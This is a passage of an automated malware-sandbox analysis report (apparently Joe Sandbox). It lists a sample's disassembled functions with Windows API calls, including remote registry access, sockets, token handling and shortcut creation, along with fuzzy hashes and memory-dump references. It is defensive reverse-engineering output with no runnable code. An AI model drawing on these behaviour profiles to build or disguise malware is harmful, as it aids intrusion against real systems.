                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 4072794657-3128320259
                                                        • Opcode ID: b134e7699e92747548ca089b4e89168faaa1ce75a75f988c2e23a92d68d4cda3
                                                        • Instruction ID: 503afdf9be22de54772782cb2e6ebecfab13b8c1e5c8f28b039e82954db84afb
                                                        • Opcode Fuzzy Hash: b134e7699e92747548ca089b4e89168faaa1ce75a75f988c2e23a92d68d4cda3
                                                        • Instruction Fuzzy Hash: F40186F25002087FE711ABA19D89EE7736CE709701F5018A2B70AF2042E6749E888F74
                                                        Function 00E6096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(0103E158,0103E158), ref: 00E6097B
                                                        • EnterCriticalSection.KERNEL32(0103E138,00000000), ref: 00E6098D
                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 00E6099B
                                                        • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00E609A9
                                                        • CloseHandle.KERNEL32(?), ref: 00E609B8
                                                        • InterlockedExchange.KERNEL32(0103E158,000001F6), ref: 00E609C8
                                                        • LeaveCriticalSection.KERNEL32(0103E138), ref: 00E609CF
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: b67acfba14f248e93ec7302709ec342eb4c7d5ed5c88ec30db50a28d2651b0bc
                                                        • Instruction ID: 3365a53749424b5308b73ec0c1682adaa60c43b609eb6e2f13d8b69150b8545c
                                                        • Opcode Fuzzy Hash: b67acfba14f248e93ec7302709ec342eb4c7d5ed5c88ec30db50a28d2651b0bc
                                                        • Instruction Fuzzy Hash: E2F01D31442912AFD7415B95EE8CAD67B35BF42752F502015F105608B1C7749469CFA0
                                                        Function 00E71C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E71DC0
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E71DE1
                                                        • WSAGetLastError.WSOCK32 ref: 00E71DF2
                                                        • htons.WSOCK32(?,?,?,?,?), ref: 00E71EDB
                                                        • inet_ntoa.WSOCK32(?), ref: 00E71E8C
                                                          • Part of subcall function 00E539E8: _strlen.LIBCMT ref: 00E539F2
                                                          • Part of subcall function 00E73224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00E6EC0C), ref: 00E73240
                                                        • _strlen.LIBCMT ref: 00E71F35
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3203458085-0
                                                        • Opcode ID: ccfd88fb199881b6a589990b1e988cf584e0687f118dc200818c663e0e93f59a
                                                        • Instruction ID: 14c55331d0d2ade03437468036516a77bc195398ff9fc1118f2ca674fa9e55f1
                                                        • Opcode Fuzzy Hash: ccfd88fb199881b6a589990b1e988cf584e0687f118dc200818c663e0e93f59a
                                                        • Instruction Fuzzy Hash: BEB1BE31204340AFC324DF28C895E6AB7E5AF85318F54D58CF55A6B2E2CB31ED46CBA1
                                                        Function 00E201B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __allrem.LIBCMT ref: 00E200BA
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E200D6
                                                        • __allrem.LIBCMT ref: 00E200ED
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E2010B
                                                        • __allrem.LIBCMT ref: 00E20122
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E20140
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                        • String ID:
                                                        • API String ID: 1992179935-0
                                                        • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                        • Instruction ID: 163378e448bdf0407427b321d473d9bc23bf200dcfcf3765892f838b65c9b7c4
                                                        • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                        • Instruction Fuzzy Hash: 07811672B007169BE7249F28DC41BAB73E9AF45324F24653EF551F62C2E7B0D9418790
                                                        Function 00E261FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E182D9,00E182D9,?,?,?,00E2644F,00000001,00000001,?), ref: 00E26258
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E2644F,00000001,00000001,?,?,?,?), ref: 00E262DE
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E263D8
                                                        • __freea.LIBCMT ref: 00E263E5
                                                          • Part of subcall function 00E23820: RtlAllocateHeap.NTDLL(00000000,?,00EC1444,?,00E0FDF5,?,?,00DFA976,00000010,00EC1440,00DF13FC,?,00DF13C6,?,00DF1129), ref: 00E23852
                                                        • __freea.LIBCMT ref: 00E263EE
                                                        • __freea.LIBCMT ref: 00E26413
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1414292761-0
                                                        • Opcode ID: b6182d3ef9a74ff96b3d81cb606a3759db8ae11089a833c0f43aad798f7861f7
                                                        • Instruction ID: 7a1ebba2bc10953c5179ee35f1e72e1bc34aa63c56323d736e910a8d1d0ba6bb
                                                        • Opcode Fuzzy Hash: b6182d3ef9a74ff96b3d81cb606a3759db8ae11089a833c0f43aad798f7861f7
                                                        • Instruction Fuzzy Hash: 8A510372A00226AFDB258F64EC81EAF77A9EF94714F255369FC05F6190DB34DC40CAA0
                                                        Function 00E7BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                          • Part of subcall function 00E7C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7B6AE,?,?), ref: 00E7C9B5
                                                          • Part of subcall function 00E7C998: _wcslen.LIBCMT ref: 00E7C9F1
                                                          • Part of subcall function 00E7C998: _wcslen.LIBCMT ref: 00E7CA68
                                                          • Part of subcall function 00E7C998: _wcslen.LIBCMT ref: 00E7CA9E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E7BCCA
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E7BD25
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E7BD6A
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E7BD99
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E7BDF3
                                                        • RegCloseKey.ADVAPI32(?), ref: 00E7BDFF
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                        • String ID:
                                                        • API String ID: 1120388591-0
                                                        • Opcode ID: a15b6ef6b5cab2fc138a840900213c544ebd22e6ea7bd1076a8fcf3303e81e0f
                                                        • Instruction ID: a1895b55e73806e20bab436f690ba565e414ef86c42aa50d42f995f8798a488e
                                                        • Opcode Fuzzy Hash: a15b6ef6b5cab2fc138a840900213c544ebd22e6ea7bd1076a8fcf3303e81e0f
                                                        • Instruction Fuzzy Hash: 43819B70208245AFC714DF24C891F6ABBE5FF84308F14996CF5599B2A2DB31ED45CBA2
                                                        Function 00E4F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000035), ref: 00E4F7B9
                                                        • SysAllocString.OLEAUT32(00000001), ref: 00E4F860
                                                        • VariantCopy.OLEAUT32(00E4FA64,00000000), ref: 00E4F889
                                                        • VariantClear.OLEAUT32(00E4FA64), ref: 00E4F8AD
                                                        • VariantCopy.OLEAUT32(00E4FA64,00000000), ref: 00E4F8B1
                                                        • VariantClear.OLEAUT32(?), ref: 00E4F8BB
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                        • String ID:
                                                        • API String ID: 3859894641-0
                                                        • Opcode ID: 31b32358a42bb4ed0e93ee090364f6c423a2a142aad0e3806f89c320a13ce530
                                                        • Instruction ID: 05304f776c0a13c8a27ac94055c35adeee94816da7a2a04740a43e9b97ffb5d0
                                                        • Opcode Fuzzy Hash: 31b32358a42bb4ed0e93ee090364f6c423a2a142aad0e3806f89c320a13ce530
                                                        • Instruction Fuzzy Hash: 0751D931A00310BACF246FA5E895B79B3E4EF85B14F24A467EA05FF291DB708C40C766
                                                        Function 00E6910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF7620: _wcslen.LIBCMT ref: 00DF7625
                                                          • Part of subcall function 00DF6B57: _wcslen.LIBCMT ref: 00DF6B6A
                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 00E694E5
                                                        • _wcslen.LIBCMT ref: 00E69506
                                                        • _wcslen.LIBCMT ref: 00E6952D
                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00E69585
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$FileName$OpenSave
                                                        • String ID: X
                                                        • API String ID: 83654149-3081909835
                                                        • Opcode ID: d72aac22d530321adb7df21e72ee82e5e19b0d2dc2c5c672277f898b2b8a9fcb
                                                        • Instruction ID: 8af08fa376402d2ee4c7f3bc9355cc812a17eeed27cd4ab2579030afd350e261
                                                        • Opcode Fuzzy Hash: d72aac22d530321adb7df21e72ee82e5e19b0d2dc2c5c672277f898b2b8a9fcb
                                                        • Instruction Fuzzy Hash: F3E1AD315083009FC724EF24D891A6AB7E4FF85354F05996DE999AB3A2DB30DD05CBA2
                                                        Function 00E0920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E09BB2
                                                        • BeginPaint.USER32(?,?,?), ref: 00E09241
                                                        • GetWindowRect.USER32(?,?), ref: 00E092A5
                                                        • ScreenToClient.USER32(?,?), ref: 00E092C2
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E092D3
                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00E09321
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00E471EA
                                                          • Part of subcall function 00E09339: BeginPath.GDI32(00000000), ref: 00E09357
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                        • String ID:
                                                        • API String ID: 3050599898-0
                                                        • Opcode ID: 300ce6c676a1a72cb95e985672b6bcf6d95cd2c4d01874b79b364aac9850a69a
                                                        • Instruction ID: 737a7e53cca940a4d9a23439d0352c2e91b818064b6f3014738b6fbd5c5424f6
                                                        • Opcode Fuzzy Hash: 300ce6c676a1a72cb95e985672b6bcf6d95cd2c4d01874b79b364aac9850a69a
                                                        • Instruction Fuzzy Hash: C1418E70105300AFD711DF25DC84FAA7BF8EB86724F141269F994A72E3C7319889DBA1
                                                        Function 00E607EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E6080C
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00E60847
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00E60863
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00E608DC
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00E608F3
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E60921
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3368777196-0
                                                        • Opcode ID: 4c92ee669c281a6846354069b98c245b700fbda26701d3db106b1edc2a0b93ba
                                                        • Instruction ID: da89ae021e6c94c4b1726d74bcbf02da4e4c879dc7dbb9c489b506ebe74af7be
                                                        • Opcode Fuzzy Hash: 4c92ee669c281a6846354069b98c245b700fbda26701d3db106b1edc2a0b93ba
                                                        • Instruction Fuzzy Hash: 9D418831900205EFDF14EF55EC85AAA77B9FF44310F1040A9ED04AA297DB30DEA5CBA0
                                                        Function 00E881DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E4F3AB,00000000,?,?,00000000,?,00E4682C,00000004,00000000,00000000), ref: 00E8824C
                                                        • EnableWindow.USER32(?,00000000), ref: 00E88272
                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E882D1
                                                        • ShowWindow.USER32(?,00000004), ref: 00E882E5
                                                        • EnableWindow.USER32(?,00000001), ref: 00E8830B
                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E8832F
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: 7d1596bbf268650915d690d4d08280e0bff1fcf6c894a9d1a690e406c58501b0
                                                        • Instruction ID: 4864d788c3a5e020a296d1c31adc4c4f2426c1edd374c7adc91855315640bd17
                                                        • Opcode Fuzzy Hash: 7d1596bbf268650915d690d4d08280e0bff1fcf6c894a9d1a690e406c58501b0
                                                        • Instruction Fuzzy Hash: D241D634601640EFDB22EF15C995FE47BE0BB46718F5821A9E94CAB273CB32A845CB51
                                                        Function 00E54C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00E54C95
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E54CB2
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E54CEA
                                                        • _wcslen.LIBCMT ref: 00E54D08
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E54D10
                                                        • _wcsstr.LIBVCRUNTIME ref: 00E54D1A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                        • String ID:
                                                        • API String ID: 72514467-0
                                                        • Opcode ID: cea798247481130ad14013859cea6f1f23902663b6a0959a1ca7057fd1ec9910
                                                        • Instruction ID: c1a6306553bfb542c67ca58d49ce308b51c9b6eb66168a22d6bd1f66fc74aa13
                                                        • Opcode Fuzzy Hash: cea798247481130ad14013859cea6f1f23902663b6a0959a1ca7057fd1ec9910
                                                        • Instruction Fuzzy Hash: DE2107B1204200BBEB255B26DC09E7B7BE8DF45758F105439FC09EA1D1EA71DC8593A1
                                                        Function 00E6581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF3A97,?,?,00DF2E7F,?,?,?,00000000), ref: 00DF3AC2
                                                        • _wcslen.LIBCMT ref: 00E6587B
                                                        • CoInitialize.OLE32(00000000), ref: 00E65995
                                                        • CoCreateInstance.OLE32(00E8FCF8,00000000,00000001,00E8FB68,?), ref: 00E659AE
                                                        • CoUninitialize.OLE32 ref: 00E659CC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 3172280962-24824748
                                                        • Opcode ID: cf8b818f705737665aa7c8daf32c6eaf602df1f8518f51183078b5302217e0b2
                                                        • Instruction ID: 0201befa62e06cd0949afdd6a8aee3bcefb4d63085c8fb1a8d814cb89e7d1968
                                                        • Opcode Fuzzy Hash: cf8b818f705737665aa7c8daf32c6eaf602df1f8518f51183078b5302217e0b2
                                                        • Instruction Fuzzy Hash: ADD174726087059FC714DF24D480A6ABBE1FF89354F11885DF899AB361D731EC45CBA2
                                                        Function 00E5175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E50FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E50FCA
                                                          • Part of subcall function 00E50FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E50FD6
                                                          • Part of subcall function 00E50FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E50FE5
                                                          • Part of subcall function 00E50FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E50FEC
                                                          • Part of subcall function 00E50FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E51002
                                                        • GetLengthSid.ADVAPI32(?,00000000,00E51335), ref: 00E517AE
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E517BA
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E517C1
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E517DA
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00E51335), ref: 00E517EE
                                                        • HeapFree.KERNEL32(00000000), ref: 00E517F5
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
